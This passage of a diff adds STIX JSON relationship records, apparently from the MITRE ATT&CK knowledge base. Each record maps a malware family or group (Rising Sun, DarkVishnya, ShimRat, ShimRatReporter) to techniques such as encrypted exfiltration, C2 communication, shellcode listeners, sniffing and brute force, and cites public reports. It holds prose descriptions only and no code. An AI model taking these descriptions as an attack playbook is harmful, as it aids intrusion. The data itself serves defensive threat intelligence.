+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) executed commands using cmd.exe.(Citation: McAfee Sharpshooter December 2018) ",
+ "relationship_type": "uses",
+ "id": "relationship--c1a5ba7a-659b-4ac2-90df-f3f74a3a8442",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.043Z",
+ "created": "2020-05-14T22:29:26.043Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can archive data using RC4 encryption and Base64 encoding prior to exfiltration.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--39663ad3-549e-4984-a81b-acce5cb02090",
+ "type": "relationship",
+ "modified": "2020-06-30T03:13:38.643Z",
+ "created": "2020-05-14T22:29:26.045Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can detect the computer name, operating system, and other native system information.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5bd827b4-cdaf-4d50-acb8-493f32d51acb",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.187Z",
+ "created": "2020-05-14T22:29:26.187Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can detect network adapter and IP address information.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f94c802d-62da-4689-ab35-baf9468e2423",
+ "type": "relationship",
+ "modified": "2020-06-17T15:39:20.110Z",
+ "created": "2020-05-14T22:29:26.189Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) decrypted itself using a single-byte XOR scheme. Additionally, [Rising Sun](https://attack.mitre.org/software/S0448) can decrypt its configuration data at runtime.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--4f89d6c4-29ec-4777-bbc9-b0ea78064c42",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.377Z",
+ "created": "2020-05-14T22:29:26.192Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can detect the username of the infected host.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2d5c711d-dcd6-4d50-b91f-1fda5311eef5",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.416Z",
+ "created": "2020-05-14T22:29:26.207Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) used dynamic API resolutions to various Windows APIs by leveraging LoadLibrary() and GetProcAddress().(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ed3539fa-7ae7-45b0-9f0f-d62460ed07b1",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.380Z",
+ "created": "2020-05-14T22:29:26.210Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "Configuration data used by [Rising Sun](https://attack.mitre.org/software/S0448) is encrypted using RC4.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6bb9972b-cec8-4de0-966e-8fea90b4941c",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.434Z",
+ "created": "2020-05-14T22:29:26.212Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used Bash Bunny, Raspberry Pi, netbooks or inexpensive laptops to connect to the company\u2019s local network.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--04d1a31c-97c2-4cdd-8fb7-391c984e2fad",
+ "type": "relationship",
+ "modified": "2020-05-15T13:17:57.692Z",
+ "created": "2020-05-15T13:17:57.692Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
+ "relationship_type": "uses",
+ "id": "relationship--475fef11-3344-4305-9710-cc41ba8acc0a",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "(Citation: Securelist DarkVishnya Dec 2018) ",
+ "type": "relationship",
+ "modified": "2020-05-15T15:08:55.549Z",
+ "created": "2020-05-15T13:17:57.723Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) scanned the network for public shared folders.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3a31f8c0-36bf-40b5-90d2-d03c72b2c8d8",
+ "type": "relationship",
+ "modified": "2020-05-15T13:17:57.719Z",
+ "created": "2020-05-15T13:17:57.719Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d",
+ "relationship_type": "uses",
+ "id": "relationship--29b5ee68-0bb0-4264-a781-ece3014fb3dd",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "(Citation: Securelist DarkVishnya Dec 2018) ",
+ "type": "relationship",
+ "modified": "2020-05-15T15:08:55.560Z",
+ "created": "2020-05-15T13:17:57.731Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) used LZ compression to compress initial reconnaissance reports before sending to the C2.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--70af600c-ca7a-4ea3-8c03-3a166e2d88a7",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.424Z",
+ "created": "2020-05-15T13:41:30.676Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) used the Windows function GetExtendedUdpTable to detect connected UDP endpoints.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--16bea458-8018-4e53-a377-5970747521ab",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.505Z",
+ "created": "2020-05-15T13:41:30.679Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) used several Windows API functions to gather information from the infected system.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--f5ced467-529f-4ce2-9f30-6a4a80565e87",
+ "type": "relationship",
+ "modified": "2020-05-15T13:41:30.707Z",
+ "created": "2020-05-15T13:41:30.707Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ca38f31f-3551-49e3-835b-588693a8b512",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.758Z",
+ "created": "2020-05-15T13:43:22.758Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) created new services for shellcode loaders distribution.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--12dcf7c0-4f6b-4eb1-9317-3337822ecbe1",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.771Z",
+ "created": "2020-05-15T13:43:22.771Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used PowerShell to create shellcode loaders.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--bff00753-95ef-4a13-96fa-963365520573",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.780Z",
+ "created": "2020-05-15T13:43:22.780Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used DameWare Mini Remote Control for lateral movement.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--96934e69-6d38-4ebd-970d-3d9bf88e03e3",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.791Z",
+ "created": "2020-05-15T13:43:22.791Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used network sniffing to obtain login data. (Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--c2ba1f7a-1951-47df-855b-3f42a60a9901",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.793Z",
+ "created": "2020-05-15T13:43:22.793Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used brute-force attack to obtain login data.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--5a9197b3-c5fb-4288-9fdf-684fa289435b",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.806Z",
+ "created": "2020-05-15T13:43:22.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) performed port scanning to obtain the list of active services.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3778dc3a-14b2-43e9-8e37-d1c3c731b390",
+ "type": "relationship",
+ "modified": "2020-05-15T13:43:22.809Z",
+ "created": "2020-05-15T13:43:22.809Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) sent generated reports to the C2 via HTTP POST requests.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--06317104-8397-453e-bef8-aa3269360ffc",
+ "type": "relationship",
+ "modified": "2020-05-15T13:45:25.432Z",
+ "created": "2020-05-15T13:45:25.432Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can be issued a command shell function from the C2.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--84d3fa4b-a4c6-404c-a363-0d9a96381952",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.268Z",
+ "created": "2020-05-15T15:04:34.028Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has used a secondary C2 location if the first was unavailable.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a2118212-1594-4fb1-8076-5a8649756c9c",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.383Z",
+ "created": "2020-05-15T15:04:34.051Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can sleep when instructed to do so by the C2.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7060e30c-cbb6-4b79-ad52-5e1619e030f0",
+ "type": "relationship",
+ "modified": "2020-05-15T18:32:19.789Z",
+ "created": "2020-05-15T15:04:34.041Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has used Windows API functions to install the service and shim.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--bdd7c955-c41a-4b68-9eb6-1ecd66869457",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.391Z",
+ "created": "2020-05-15T15:04:34.090Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444)'s loader has been packed with the compressed [ShimRat](https://attack.mitre.org/software/S0444) core DLL and the legitimate DLL for it to hijack.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--ac88262c-e14d-4f52-a5df-bbddc6d5c1bc",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.405Z",
+ "created": "2020-05-15T15:04:34.092Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
